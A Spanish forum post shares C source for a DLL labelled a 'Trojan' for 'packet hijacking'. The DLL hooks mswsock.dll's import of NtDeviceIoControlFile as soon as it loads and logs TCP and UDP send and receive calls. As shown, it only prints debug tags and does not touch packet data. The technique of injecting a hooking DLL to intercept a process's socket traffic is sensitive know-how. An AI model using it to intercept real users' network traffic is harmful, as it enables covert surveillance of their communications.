Hola a todos, les comparto el siguiente código, hecho por mi gran amigo ZwClose7Team.

Espero que les guste a todos.


    //////////////////////////////////////////////////////////////////////////
    // Project:     Trojan Dll,Packet Hijacking
    // Author:      http://pastebin.com/uaj6BksR
    // Date:        2014-3-21
    //////////////////////////////////////////////////////////////////////////
     
    #include <windows.h>
    #include <winnt.h>
     
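    // AFD (ancillary function driver) IOCTL codes that reach
    // NtDeviceIoControlFile() on a socket handle. They are undocumented and
    // were taken from a particular Windows build (file dated 2014-3-21).
    // NOTE(review): verify these values against the target OS before relying
    // on them; they are not guaranteed to be stable across releases.
    #define AFD_BIND                0x12003
    #define AFD_CONNECT             0x12007
    #define AFD_RECV                0x12017
    #define AFD_RECVFROM            0x1201B
    #define AFD_SEND                0x1201f
    #define AFD_SENDTO              0x12023
    #define AFD_SELECT              0x12024
    #define AFD_SET_CONTEXT         0x12047
    // Not referenced anywhere in this file; same value as AFD_SEND.
    #define CV                      0x1201f
     
    // NTSTATUS values >= 0 are success codes. Note that this includes
    // informational codes such as STATUS_PENDING, not only STATUS_SUCCESS.
    #define NT_SUCCESS(Status) (((NTSTATUS)(Status)) >= 0)
     
    // Local copy of the native I/O status block. winternl.h declares the same
    // type, so do not include both.
    typedef struct _IO_STATUS_BLOCK {
            union {
                    NTSTATUS Status;
                    PVOID Pointer;
            } DUMMYUNIONNAME;
     
            ULONG_PTR Information;
    } IO_STATUS_BLOCK, *PIO_STATUS_BLOCK;
     
    // APC completion routine type used by the native I/O calls.
    typedef
    VOID
    (NTAPI *PIO_APC_ROUTINE) (
            IN PVOID ApcContext,
            IN PIO_STATUS_BLOCK IoStatusBlock,
            IN ULONG Reserved
            );
     
    // Signature of ntdll!NtDeviceIoControlFile.
    // NOTE(review): the real export is NTAPI (__stdcall on 32-bit x86). Neither
    // this typedef nor NewDeviceIoControlFile() below carries NTAPI, so an x86
    // build that does not default to __stdcall (/Gz) would corrupt the caller's
    // stack on every hooked call. Add NTAPI to both declarations together.
    typedef NTSTATUS (*NTDEVICEIOCONTROLFILE)(
            IN HANDLE FileHandle,
            IN HANDLE Event OPTIONAL,
            IN PIO_APC_ROUTINE ApcRoutine OPTIONAL,
            IN PVOID ApcContext OPTIONAL,
            OUT PIO_STATUS_BLOCK IoStatusBlock,
            IN ULONG IoControlCode,
            IN PVOID InputBuffer OPTIONAL,
            IN ULONG InputBufferLength,
            OUT PVOID OutputBuffer OPTIONAL,
            IN ULONG OutputBufferLength);
     
    // Address of the real NtDeviceIoControlFile, read from mswsock.dll's import
    // table by HookApi(TRUE) before the slot is overwritten. NULL until the hook
    // has been installed; NewDeviceIoControlFile() forwards through it.
    NTDEVICEIOCONTROLFILE ZwDeviceIoControlFile = NULL;
     
     
    // Install (TRUE) or remove (FALSE) the IAT hook on mswsock.dll's import of
    // NtDeviceIoControlFile. Returns TRUE when the import slot was written.
    BOOL HookApi(BOOL bFlag);
     
    // Replacement for NtDeviceIoControlFile; same signature as the original
    // (see the calling-convention note on NTDEVICEIOCONTROLFILE above).
    NTSTATUS NewDeviceIoControlFile(
            IN HANDLE FileHandle,
            IN HANDLE Event OPTIONAL,
            IN PIO_APC_ROUTINE ApcRoutine OPTIONAL,
            IN PVOID ApcContext OPTIONAL,
            OUT PIO_STATUS_BLOCK IoStatusBlock,
            IN ULONG IoControlCode,
            IN PVOID InputBuffer OPTIONAL,
            IN ULONG InputBufferLength,
            OUT PVOID OutputBuffer OPTIONAL,
            IN ULONG OutputBufferLength);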
     
     
    //////////////////////////////////////////////////////////////////////////
    // DLL entry point. Installs the import hook when the DLL is mapped into a
    // process and removes it again when the DLL is unloaded. Thread
    // attach/detach notifications are ignored.
    //
    // Always returns TRUE, so a failed HookApi() does not stop the DLL from
    // loading; the failure is silent.
    // NOTE(review): HookApi() calls LoadLibrary() from inside DllMain, i.e.
    // while the loader lock is held, which Microsoft's DllMain guidance says to
    // avoid.
    //////////////////////////////////////////////////////////////////////////
    int WINAPI DllMain(__in void * _HDllHandle, __in unsigned _Reason, __in_opt void * _Reserved)
    {
            switch (_Reason)
            {
            case DLL_PROCESS_ATTACH:
                    HookApi(TRUE);
                    break;
            case DLL_PROCESS_DETACH:
                    HookApi(FALSE);
                    break;
            default:
                    break;
            }
     
            return TRUE;
    }
     
     
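    //////////////////////////////////////////////////////////////////////////
    // Install (bFlag == TRUE) or remove (bFlag == FALSE) an IAT hook on
    // mswsock.dll's import of ntdll!NtDeviceIoControlFile.
    //
    // Walks mswsock.dll's import directory, finds the ntdll.dll descriptor,
    // matches the import by name through the unbound (OriginalFirstThunk)
    // table, and overwrites the parallel bound (FirstThunk) slot with either
    // NewDeviceIoControlFile or the saved original pointer.
    //
    // Returns TRUE when the slot was found and written, FALSE otherwise
    // (module not found, malformed headers, import not present, write failed,
    // or an uninstall requested before any install).
    //
    // Changes from the earlier version:
    //  - the original pointer is captured only once. Removal used to re-read
    //    the already-patched slot and write the hook address back into it, so
    //    after the DLL unloaded mswsock kept calling into unmapped memory;
    //  - image offsets and the IAT slot use ULONG_PTR / thunk-sized steps
    //    instead of ULONG / DWORD, which truncated pointers and used the wrong
    //    stride on x64;
    //  - imports by ordinal and descriptors with no OriginalFirstThunk are
    //    skipped instead of being read as name strings;
    //  - the WriteProcessMemory() result is checked.
    //////////////////////////////////////////////////////////////////////////
    BOOL HookApi(BOOL bFlag)
    {
            // The reference from LoadLibrary is intentionally not released: it
            // keeps mswsock.dll (whose IAT is patched) mapped while this DLL is.
            HMODULE hModule = LoadLibrary(TEXT("mswsock.dll"));
            if (hModule == NULL)
            {
                    return FALSE;
            }
            ULONG_PTR base = (ULONG_PTR)hModule;
     
            PIMAGE_DOS_HEADER pDosHdr = (PIMAGE_DOS_HEADER)base;
            if (pDosHdr->e_magic != IMAGE_DOS_SIGNATURE)
            {
                    return FALSE;
            }
     
            PIMAGE_NT_HEADERS pNtHdr = (PIMAGE_NT_HEADERS)(base + pDosHdr->e_lfanew);
            if (pNtHdr->Signature != IMAGE_NT_SIGNATURE)
            {
                    return FALSE;
            }
     
            IMAGE_DATA_DIRECTORY importDir = pNtHdr->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_IMPORT];
            if (importDir.VirtualAddress == 0 || importDir.Size == 0)
            {
                    return FALSE;
            }
     
            PIMAGE_IMPORT_DESCRIPTOR pImportDescriptor = (PIMAGE_IMPORT_DESCRIPTOR)(base + importDir.VirtualAddress);
            for (; pImportDescriptor->FirstThunk != 0; pImportDescriptor++)
            {
                    const char *dllname = (const char *)(base + pImportDescriptor->Name);
                    if (_stricmp(dllname, "ntdll.dll") != 0)
                    {
                            continue;
                    }
     
                    // Without an unbound thunk table there are no names to match.
                    if (pImportDescriptor->OriginalFirstThunk == 0)
                    {
                            continue;
                    }
     
                    // Name table and address table run in parallel, one thunk each.
                    PIMAGE_THUNK_DATA pNameThunk = (PIMAGE_THUNK_DATA)(base + pImportDescriptor->OriginalFirstThunk);
                    PIMAGE_THUNK_DATA pAddrThunk = (PIMAGE_THUNK_DATA)(base + pImportDescriptor->FirstThunk);
                    for (; pNameThunk->u1.AddressOfData != 0; pNameThunk++, pAddrThunk++)
                    {
                            // Ordinal imports carry no name string to compare.
                            if (IMAGE_SNAP_BY_ORDINAL(pNameThunk->u1.Ordinal))
                            {
                                    continue;
                            }
     
                            PIMAGE_IMPORT_BY_NAME pImport = (PIMAGE_IMPORT_BY_NAME)(base + pNameThunk->u1.AddressOfData);
                            if (_stricmp((const char *)pImport->Name, "NtDeviceIoControlFile") != 0)
                            {
                                    continue;
                            }
     
                            // pAddrThunk is the bound IAT slot mswsock calls through.
                            ULONG_PTR *lpAdr = (ULONG_PTR *)&pAddrThunk->u1.Function;
                            ULONG_PTR newValue;
                            if (bFlag)
                            {
                                    // Save the original only the first time, so a repeated
                                    // install never records our own hook as "original".
                                    if (ZwDeviceIoControlFile == NULL)
                                    {
                                            ZwDeviceIoControlFile = (NTDEVICEIOCONTROLFILE)*lpAdr;
                                    }
                                    newValue = (ULONG_PTR)NewDeviceIoControlFile;
                            }
                            else
                            {
                                    // Nothing to restore if the hook was never installed.
                                    if (ZwDeviceIoControlFile == NULL)
                                    {
                                            return FALSE;
                                    }
                                    newValue = (ULONG_PTR)ZwDeviceIoControlFile;
                            }
     
                            // WriteProcessMemory is used instead of a plain store because
                            // the IAT page is normally not writable once the loader has
                            // bound it.
                            SIZE_T written = 0;
                            if (!WriteProcessMemory(GetCurrentProcess(), lpAdr, &newValue, sizeof(newValue), &written) ||
                                written != sizeof(newValue))
                            {
                                    return FALSE;
                            }
                            return TRUE;
                    }
            }
     
            return FALSE;
    }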
     
     
     
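    //////////////////////////////////////////////////////////////////////////
    // Replacement for ntdll!NtDeviceIoControlFile installed by HookApi().
    //
    // Every call is forwarded unchanged to the saved original. When the
    // original reports success and the control code is one of the four AFD
    // data-path requests, a one-line tag is written to the debugger output.
    // Nothing in the request buffers is read or modified; only IoControlCode
    // is used for classification.
    //
    // Returns the original's status verbatim.
    // NOTE(review): on overlapped sockets the original may return
    // STATUS_PENDING, which NT_SUCCESS() accepts, so a tag here does not mean
    // the transfer has completed. The TCP/UDP wording in the tags is the
    // original author's; AFD_RECV/AFD_SEND apply to connected sockets
    // generally. This function shares the NTAPI calling-convention caveat
    // noted on the NTDEVICEIOCONTROLFILE typedef.
    //
    // Earlier version carried commented-out buffer-parsing code referencing a
    // PAFD_INFO type that is not declared anywhere in this file; removed.
    //////////////////////////////////////////////////////////////////////////
    NTSTATUS NewDeviceIoControlFile(IN HANDLE FileHandle,
                                    IN HANDLE Event OPTIONAL,
                                    IN PIO_APC_ROUTINE ApcRoutine OPTIONAL,
                                    IN PVOID ApcContext OPTIONAL,
                                    OUT PIO_STATUS_BLOCK IoStatusBlock,
                                    IN ULONG IoControlCode,
                                    IN PVOID InputBuffer OPTIONAL,
                                    IN ULONG InputBufferLength,
                                    OUT PVOID OutputBuffer OPTIONAL,
                                    IN ULONG OutputBufferLength)
    {
            NTSTATUS status = ZwDeviceIoControlFile(FileHandle, Event, ApcRoutine, ApcContext,
                                                    IoStatusBlock, IoControlCode,
                                                    InputBuffer, InputBufferLength,
                                                    OutputBuffer, OutputBufferLength);
            if (!NT_SUCCESS(status))
            {
                    return status;
            }
     
            // Guarded with SEH so that a fault in the logging path can never be
            // surfaced to the socket caller, whose I/O has already been issued.
            __try
            {
                    const char *tag = NULL;
                    switch (IoControlCode)
                    {
                    case AFD_RECV:
                            tag = "[TCP Recv Packets]\n";
                            break;
                    case AFD_SEND:
                            tag = "[TCP Send Packets]\n";
                            break;
                    case AFD_SENDTO:
                            tag = "[UDP Sendto Packets]\n";
                            break;
                    case AFD_RECVFROM:
                            tag = "[UDP RecvFrom Packets]\n";
                            break;
                    default:
                            // Any other AFD or non-AFD control code passes through silently.
                            break;
                    }
                    if (tag != NULL)
                    {
                            OutputDebugStringA(tag);
                    }
            }
            __except (EXCEPTION_EXECUTE_HANDLER)
            {
                    // Deliberately swallowed: logging must not fail the caller's I/O.
            }
     
            return status;
    }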
download :

[Enlace externo eliminado para invitados]


NoExistente